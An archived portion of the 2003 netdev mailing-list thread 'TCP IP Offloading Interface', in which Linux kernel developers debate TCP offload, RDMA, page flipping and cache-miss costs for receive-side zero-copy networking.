netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <1058113895.554.7.camel@dhcp22.swansea.linux.org.uk> In-Reply-To: <1058113895.554.7.camel@dhcp22.swansea.linux.org.uk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3997 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Alan Cox wrote: > Finally if you are streaming objects by non mapped references (eg > sendfile or see LM's paper from long ago on splice()) then the problem > goes away. I had forgotten all about splice. For interested readers, here is the link: http://www.bitmover.com/lm/papers/splice.ps Jeff From davem@redhat.com Sun Jul 13 16:11:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 16:11:13 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DNB3Fl010851 for ; Sun, 13 Jul 2003 16:11:04 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA09626; Sun, 13 Jul 2003 16:02:00 -0700 Date: Sun, 13 Jul 2003 16:02:00 -0700 From: "David S. Miller" To: Roland Dreier Cc: alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-Id: <20030713160200.571716cf.davem@redhat.com> In-Reply-To: <52u19qwg53.fsf@topspin.com> References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3998 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On 13 Jul 2003 09:22:32 -0700 Roland Dreier wrote: > David> TOE is evil, read this: > > David> http://www.usenix.org/events/hotos03/tech/full_papers/mogul/mogul.pdf > Your ideas are certainly very interesting, and I would be happy to see > hardware that supports flow identification. But the Usenix paper > you're citing completely disagrees with you! I didn't say I agree with all of Moguls ideas, just his anti-TOE arguments. For example, I also think RDMA sucks too yet he thinks it's a good iea. > For example, Mogul writes: > > "Nevertheless, copy-avoidance designs have not been widely adopted, > due to significant limitations. For example, when network maximum > segment size (MSS) values are smaller than VM page sizes, which is > often the case, page-remapping techniques are insufficient (and > page-remapping often imposes overheads of its own.)" On send this doesn't matter, on receive you use my clever receive buffer handling + flow cache idea to accumulate the data portion of packets into page sized chunks for the networking to flip. You obviously don't understand my ideas if you think that it matters whether there is some relationship between the MTU and the system page size necessary for the scheme to work. From lm@bitmover.com Sun Jul 13 16:35:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 16:35:19 -0700 (PDT) Received: from smtp.bitmover.com (smtp.bitmover.com [192.132.92.12]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DNZBFl011739 for ; Sun, 13 Jul 2003 16:35:13 -0700 Received: from work.bitmover.com (ipcop.bitmover.com [192.132.92.15]) by smtp.bitmover.com (8.12.9/8.12.9) with ESMTP id h6E7bnm7005163; Mon, 14 Jul 2003 00:37:49 -0700 Received: (from lm@localhost) by work.bitmover.com (8.11.6/8.11.6) id h6DNZ3s13205; Sun, 13 Jul 2003 16:35:03 -0700 Date: Sun, 13 Jul 2003 16:35:03 -0700 From: Larry McVoy To: "David S. Miller" Cc: Roland Dreier , alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-ID: <20030713233503.GA31793@work.bitmover.com> Mail-Followup-To: Larry McVoy , "David S. Miller" , Roland Dreier , alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030713160200.571716cf.davem@redhat.com> User-Agent: Mutt/1.4i X-MailScanner-Information: Please contact the ISP for more information X-MailScanner: Found to be clean X-MailScanner-SpamCheck: not spam (whitelisted), SpamAssassin (score=0.5, required 7, AWL, DATE_IN_PAST_06_12) X-archive-position: 3999 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lm@bitmover.com Precedence: bulk X-list: netdev On Sun, Jul 13, 2003 at 04:02:00PM -0700, David S. Miller wrote: > On send this doesn't matter, on receive you use my clever receive > buffer handling + flow cache idea to accumulate the data portion of > packets into page sized chunks for the networking to flip. Please don't. I think page flipping was a bad idea. I think you'd be better off to try and make the data flow up the stack in small enough windows that it all sits in the cache. One thing SGI taught me (not that they wanted to do so) is that infinitely large packets are infinitely stupid, for lots of reasons. One is that you have to buffer them somewhere and another is that the bigger they are the bigger your cache needs to be to go fast. -- --- Larry McVoy lm at bitmover.com http://www.bitmover.com/lm From davem@redhat.com Sun Jul 13 16:49:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 16:49:14 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DNn7Fl012535 for ; Sun, 13 Jul 2003 16:49:07 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA09694; Sun, 13 Jul 2003 16:40:03 -0700 Date: Sun, 13 Jul 2003 16:40:03 -0700 From: "David S. Miller" To: Larry McVoy Cc: roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-Id: <20030713164003.21839eb4.davem@redhat.com> In-Reply-To: <20030713233503.GA31793@work.bitmover.com> References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4000 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 13 Jul 2003 16:35:03 -0700 Larry McVoy wrote: > On Sun, Jul 13, 2003 at 04:02:00PM -0700, David S. Miller wrote: > > On send this doesn't matter, on receive you use my clever receive > > buffer handling + flow cache idea to accumulate the data portion of > > packets into page sized chunks for the networking to flip. > > Please don't. I think page flipping was a bad idea. I think you'd be > better off to try and make the data flow up the stack in small enough > windows that it all sits in the cache. At 10GB/sec nothing fits in the cache :-) > One thing SGI taught me (not that they wanted to do so) is that infinitely > large packets are infinitely stupid, for lots of reasons. One is that > you have to buffer them somewhere and another is that the bigger they > are the bigger your cache needs to be to go fast. The whole point is to not touch any of this data. The idea is to push the pages directly into the page cache of the filesystem. I'm not talking about doing this for userspace normal sys_recvmsg() type reads, that's an entirely different topic but if we ever did all agree to do something like that we'd have the network level infrastructure to do it already. From lm@bitmover.com Sun Jul 13 16:54:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 16:54:36 -0700 (PDT) Received: from smtp.bitmover.com (smtp.bitmover.com [192.132.92.12]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6DNsVFl012861 for ; Sun, 13 Jul 2003 16:54:32 -0700 Received: from work.bitmover.com (ipcop.bitmover.com [192.132.92.15]) by smtp.bitmover.com (8.12.9/8.12.9) with ESMTP id h6E7vAm7005336; Mon, 14 Jul 2003 00:57:11 -0700 Received: (from lm@localhost) by work.bitmover.com (8.11.6/8.11.6) id h6DNsOj13384; Sun, 13 Jul 2003 16:54:24 -0700 Date: Sun, 13 Jul 2003 16:54:24 -0700 From: Larry McVoy To: "David S. Miller" Cc: Larry McVoy , roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-ID: <20030713235424.GB31793@work.bitmover.com> Mail-Followup-To: Larry McVoy , "David S. Miller" , Larry McVoy , roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> <20030713164003.21839eb4.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030713164003.21839eb4.davem@redhat.com> User-Agent: Mutt/1.4i X-MailScanner-Information: Please contact the ISP for more information X-MailScanner: Found to be clean X-MailScanner-SpamCheck: not spam (whitelisted), SpamAssassin (score=0.5, required 7, AWL, DATE_IN_PAST_06_12) X-archive-position: 4001 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lm@bitmover.com Precedence: bulk X-list: netdev > The whole point is to not touch any of this data. > > The idea is to push the pages directly into the page cache > of the filesystem. It doesn't work. Measure the cost of the VM operations before you go down this path. Just set up a system call that swaps a page with a kernel allocated buffer and then see how many of those you can do a second. Maybe Linux is so blindingly fast this makes sense but IRIX certainly wasn't, the VM overhead hurt like crazy. Every time I tried to push the page flip idea or offloading or any of that crap, Andy Bechtolsheim would tell "the CPUs will get faster faster than you can make that work". He was right. -- --- Larry McVoy lm at bitmover.com http://www.bitmover.com/lm From davem@redhat.com Sun Jul 13 17:02:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 17:02:33 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E02QFl013250 for ; Sun, 13 Jul 2003 17:02:27 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA09728; Sun, 13 Jul 2003 16:53:23 -0700 Date: Sun, 13 Jul 2003 16:53:23 -0700 From: "David S. Miller" To: Larry McVoy Cc: lm@bitmover.com, roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-Id: <20030713165323.3fc2601f.davem@redhat.com> In-Reply-To: <20030713235424.GB31793@work.bitmover.com> References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> <20030713164003.21839eb4.davem@redhat.com> <20030713235424.GB31793@work.bitmover.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4002 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 13 Jul 2003 16:54:24 -0700 Larry McVoy wrote: > Every time I tried to push the page flip idea or offloading or any of > that crap, Andy Bechtolsheim would tell "the CPUs will get faster faster > than you can make that work". He was right. I really don't see why receive is so much of a big deal compared to send, and we do a send side version of this stuff already with zero problems. The NFS code is already basically ready to handle a fragmented packet (headers + pages), and could stick the page part into the page cache easily on receive. And it's not the CPUs that really limit us here, it's memory bandwidth. It's one thing to have a PCI-X bus fast enough to service 10Ggb/sec rates, it's yet another thing to have a memory bus and RAM underneath that which can handle moving that data over it _twice_. The infrastructure needed to support this on the networking side help us support other useful things, such as driver local packet buffer recycling. From lm@bitmover.com Sun Jul 13 17:22:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 17:22:17 -0700 (PDT) Received: from smtp.bitmover.com (smtp.bitmover.com [192.132.92.12]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E0M9Fl013691 for ; Sun, 13 Jul 2003 17:22:09 -0700 Received: from work.bitmover.com (ipcop.bitmover.com [192.132.92.15]) by smtp.bitmover.com (8.12.9/8.12.9) with ESMTP id h6E8Olm7005704; Mon, 14 Jul 2003 01:24:47 -0700 Received: (from lm@localhost) by work.bitmover.com (8.11.6/8.11.6) id h6E0M0213745; Sun, 13 Jul 2003 17:22:00 -0700 Date: Sun, 13 Jul 2003 17:22:00 -0700 From: Larry McVoy To: "David S. Miller" Cc: Larry McVoy , roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-ID: <20030714002200.GA24697@work.bitmover.com> Mail-Followup-To: Larry McVoy , "David S. Miller" , Larry McVoy , roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> <20030713164003.21839eb4.davem@redhat.com> <20030713235424.GB31793@work.bitmover.com> <20030713165323.3fc2601f.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030713165323.3fc2601f.davem@redhat.com> User-Agent: Mutt/1.4i X-MailScanner-Information: Please contact the ISP for more information X-MailScanner: Found to be clean X-MailScanner-SpamCheck: not spam (whitelisted), SpamAssassin (score=0.5, required 7, AWL, DATE_IN_PAST_06_12) X-archive-position: 4003 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lm@bitmover.com Precedence: bulk X-list: netdev On Sun, Jul 13, 2003 at 04:53:23PM -0700, David S. Miller wrote: > On Sun, 13 Jul 2003 16:54:24 -0700 > Larry McVoy wrote: > > > Every time I tried to push the page flip idea or offloading or any of > > that crap, Andy Bechtolsheim would tell "the CPUs will get faster faster > > than you can make that work". He was right. > > I really don't see why receive is so much of a big deal > compared to send, and we do a send side version of this > stuff already with zero problems. Hey, maybe it isn't, but could you please quantify the cost of the VM operations? How hard is that? -- --- Larry McVoy lm at bitmover.com http://www.bitmover.com/lm From davem@redhat.com Sun Jul 13 17:33:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 17:33:25 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E0XIFl014064 for ; Sun, 13 Jul 2003 17:33:18 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA09795; Sun, 13 Jul 2003 17:24:14 -0700 Date: Sun, 13 Jul 2003 17:24:14 -0700 From: "David S. Miller" To: Larry McVoy Cc: lm@bitmover.com, roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-Id: <20030713172414.5c888094.davem@redhat.com> In-Reply-To: <20030714002200.GA24697@work.bitmover.com> References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> <20030713164003.21839eb4.davem@redhat.com> <20030713235424.GB31793@work.bitmover.com> <20030713165323.3fc2601f.davem@redhat.com> <20030714002200.GA24697@work.bitmover.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4004 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 13 Jul 2003 17:22:00 -0700 Larry McVoy wrote: > Hey, maybe it isn't, but could you please quantify the cost of the VM > operations? How hard is that? Ok. So the page is in a non-uptodate state, NFS would have it locked, and anyone else trying to get at it would sleep. This page we have currently is "dummy" in that it is only a place holder in case we don't get a full page from the networking. We have all the infrastructure to do everything up to this point. Next, if the networking gave us a full page, we'd "replace" the dummy page with this one, which would involve: 1) delete the dummy page from the lookup, insert the networking's page 2) arrange so that all sleepers on the dummy page will do a relookup and find the new page And when we're done with the operation we wake everyone up. I can't see any part of this turning out to be expensive. From davem@redhat.com Sun Jul 13 17:37:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 17:37:44 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E0bcFl014380 for ; Sun, 13 Jul 2003 17:37:39 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA09815; Sun, 13 Jul 2003 17:28:36 -0700 Date: Sun, 13 Jul 2003 17:28:36 -0700 From: "David S. Miller" To: Roland Dreier Cc: alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-Id: <20030713172836.5dd493f5.davem@redhat.com> In-Reply-To: <52llv2vu06.fsf@topspin.com> References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <52llv2vu06.fsf@topspin.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4005 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On 13 Jul 2003 17:20:41 -0700 Roland Dreier wrote: > David> I didn't say I agree with all of Moguls ideas, just his > David> anti-TOE arguments. For example, I also think RDMA sucks > David> too yet he thinks it's a good iea. > > Sure, he talks about some weaknesses of TOE, but his conclusion is > that the time has come for OS developers to start working on TCP > offload (for storage). The bad assumption here is that this belongs in the OS. Let me ask you this, how many modern scsi drivers have to speak every piece of the SCSI bus protocol. Or fibre channel? All of it is done on the cards, and that is what I think the iSCSI people should be doing instead of putting garbage into the OS. And I've presented a solution to the problem at the OS level that doesn't require broken things like TOE and RDMA yet arrives at the same solution. > But I also think Mogul is right: iSCSI HBAs are going to force OS > designers to deal with TCP offload. You don't need to offload TCP, it's the segmentation and checksuming that has the high cost not the actual TCP logic in the operating system. RDMA and TOE both add unnecessary complications. My solution requires no protocol changes, just smart hardware which needs to be designed for any of the presented ideas anyways. From Valdis.Kletnieks@vt.edu Sun Jul 13 17:46:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 17:47:03 -0700 (PDT) Received: from turing-police.cc.vt.edu (h80ad2494.async.vt.edu [128.173.36.148]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E0kfFl014721 for ; Sun, 13 Jul 2003 17:46:42 -0700 Received: from turing-police.cc.vt.edu (localhost [127.0.0.1]) by turing-police.cc.vt.edu (8.12.10.Beta0/8.12.10.Beta0) with ESMTP id h6E0kcMQ021180; Sun, 13 Jul 2003 20:46:38 -0400 Message-Id: <200307140046.h6E0kcMQ021180@turing-police.cc.vt.edu> X-Mailer: exmh version 2.6.3 04/04/2003 with nmh-1.0.4+dev To: "David S. Miller" Cc: linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface In-Reply-To: Your message of "Sun, 13 Jul 2003 16:53:23 PDT." <20030713165323.3fc2601f.davem@redhat.com> From: Valdis.Kletnieks@vt.edu References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> <20030713164003.21839eb4.davem@redhat.com> <20030713235424.GB31793@work.bitmover.com> <20030713165323.3fc2601f.davem@redhat.com> Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_-797710378P"; micalg=pgp-sha1; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Sun, 13 Jul 2003 20:46:38 -0400 X-archive-position: 4006 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Valdis.Kletnieks@vt.edu Precedence: bulk X-list: netdev --==_Exmh_-797710378P Content-Type: text/plain; charset=us-ascii On Sun, 13 Jul 2003 16:53:23 PDT, "David S. Miller" said: > I really don't see why receive is so much of a big deal > compared to send, and we do a send side version of this > stuff already with zero problems. Well.... there's optimizations you can do on the send side.. > The NFS code is already basically ready to handle a fragmented packet > (headers + pages), and could stick the page part into the page cache > easily on receive. For example, in this case, you know a priori what the IP header will look like, so you can use tricks like scatter-gather to send the header from one place and a page-aligned data buffer from another, or start the packet at (page boundary - IP_hrd_len), or tricks of that sort. In 20 years, I've seen a lot of vendors do a lot of ugly things to speed up their IP stack, often based on the fact that they knew a lot about the packet before they started assembling it. It's hard to do tricks like that when you don't know (for instance) how many IP option fields the packet has until you've already started sucking the packet off the wire - at which point either the NIC itself has to be clever (Hmm, there's that IP offload again) or you have literally about 30 CPU cycles to do interrrupt latency *and* decide what to do.... --==_Exmh_-797710378P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) Comment: Exmh version 2.5 07/13/2001 iD8DBQE/Ef1ucC3lWbTT17ARArLqAJ9Nm0BoBW0sAS12YRjHQqnbS8taaACgisgU ouu0kT76znvhJ7TPiI5Nm8I= =J2r1 -----END PGP SIGNATURE----- --==_Exmh_-797710378P-- From lm@bitmover.com Sun Jul 13 17:48:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 17:48:32 -0700 (PDT) Received: from smtp.bitmover.com (smtp.bitmover.com [192.132.92.12]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E0mIFl015029 for ; Sun, 13 Jul 2003 17:48:18 -0700 Received: from work.bitmover.com (ipcop.bitmover.com [192.132.92.15]) by smtp.bitmover.com (8.12.9/8.12.9) with ESMTP id h6E8oum7006040; Mon, 14 Jul 2003 01:50:56 -0700 Received: (from lm@localhost) by work.bitmover.com (8.11.6/8.11.6) id h6E0m9i14058; Sun, 13 Jul 2003 17:48:09 -0700 Date: Sun, 13 Jul 2003 17:48:09 -0700 From: Larry McVoy To: "David S. Miller" Cc: Larry McVoy , roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-ID: <20030714004809.GB24697@work.bitmover.com> Mail-Followup-To: Larry McVoy , "David S. Miller" , Larry McVoy , roland@topspin.com, alan@storlinksemi.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> <20030713164003.21839eb4.davem@redhat.com> <20030713235424.GB31793@work.bitmover.com> <20030713165323.3fc2601f.davem@redhat.com> <20030714002200.GA24697@work.bitmover.com> <20030713172414.5c888094.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030713172414.5c888094.davem@redhat.com> User-Agent: Mutt/1.4i X-MailScanner-Information: Please contact the ISP for more information X-MailScanner: Found to be clean X-MailScanner-SpamCheck: not spam (whitelisted), SpamAssassin (score=0.5, required 7, AWL, DATE_IN_PAST_06_12) X-archive-position: 4007 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lm@bitmover.com Precedence: bulk X-list: netdev On Sun, Jul 13, 2003 at 05:24:14PM -0700, David S. Miller wrote: > I can't see any part of this turning out to be expensive. In theory, practice and theory are the same... I think the point I'm trying to make is that the VM stuff costs something and it shouldn't be that hard to dummy up a system call to measure it. It was counterintuitive as hell at SGI that the VM stuff would cost that much and the reasons are subtle. Part of the problem turned out to be falling out of the instruction cache - the network stack and the VM system didn't fit and that left no room at all for the app. If you are trading instruction cache misses for data misses, err, dude, I think that might be a problem. The point is to process all the data with less, not more, cache misses, right? In fact, if we agree on that then that leads you to considering the various ways you could do this and maybe your way is the right way but maybe there is a less cache intensive way. If you're right you're right, so peace. But I'd like the definition of "right" to be "less cache misses to do the same thing". In fact, if I managed to communicate only one thing in my entire set of rants and it was "pay attention to cache misses", hey, that'd be cool with me. That's how you make things go fast and I like fast. Think about it, a 3GHz machine is a .3ns clock cycle and the suckers are super scalar and hyper threaded and all that crud. Memory is about 133ns away. That's 400 clocks of stall for each cache miss. Lotta code can run in 400 clocks of super scalar/hyper threaded/fully buzzword enabled processors. -- --- Larry McVoy lm at bitmover.com http://www.bitmover.com/lm From davem@redhat.com Sun Jul 13 17:52:00 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 17:52:04 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E0ptFl015350 for ; Sun, 13 Jul 2003 17:51:58 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA09880; Sun, 13 Jul 2003 17:42:42 -0700 Date: Sun, 13 Jul 2003 17:42:42 -0700 From: "David S. Miller" To: Valdis.Kletnieks@vt.edu Cc: linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-Id: <20030713174242.3ceb8213.davem@redhat.com> In-Reply-To: <200307140046.h6E0kcMQ021180@turing-police.cc.vt.edu> References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> <20030713164003.21839eb4.davem@redhat.com> <20030713235424.GB31793@work.bitmover.com> <20030713165323.3fc2601f.davem@redhat.com> <200307140046.h6E0kcMQ021180@turing-police.cc.vt.edu> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4008 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 13 Jul 2003 20:46:38 -0400 Valdis.Kletnieks@vt.edu wrote: > On Sun, 13 Jul 2003 16:53:23 PDT, "David S. Miller" said: > > > I really don't see why receive is so much of a big deal > > compared to send, and we do a send side version of this > > stuff already with zero problems. > > Well.... there's optimizations you can do on the send side.. I consider the send side complete covered already. We don't touch any of the data portion, we only put together the headers. > It's hard to do tricks like that when you don't know (for instance) how > many IP option fields the packet has until you've already started sucking > the packet off the wire - at which point either the NIC itself has to be clever > (Hmm, there's that IP offload again) or you have literally about 30 CPU cycles > to do interrrupt latency *and* decide what to do.... There are cards, both existing and in development, that have very simple header parsing engines you can program to do stuff like this, it isn't hard at all. But this is only half of the problem, you need a flow cache and clever RX buffer management as well to make the RX side zero-copy stuff work. From jgarzik@pobox.com Sun Jul 13 17:53:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 13 Jul 2003 17:53:11 -0700 (PDT) Received: from www.linux.org.uk (IDENT:4ZYppHV6YjA5pG0aQq3aH4lRDjZDEYWG@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6E0r5Fl015661 for ; Sun, 13 Jul 2003 17:53:06 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19bkAv-0004LC-1P; Sun, 13 Jul 2003 17:58:13 +0100 Message-ID: <3F118F99.1020104@pobox.com> Date: Sun, 13 Jul 2003 12:58:01 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Alan Cox CC: Roland Dreier , "David S. Miller" , Alan Shih , Linux Kernel Mailing List , linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP 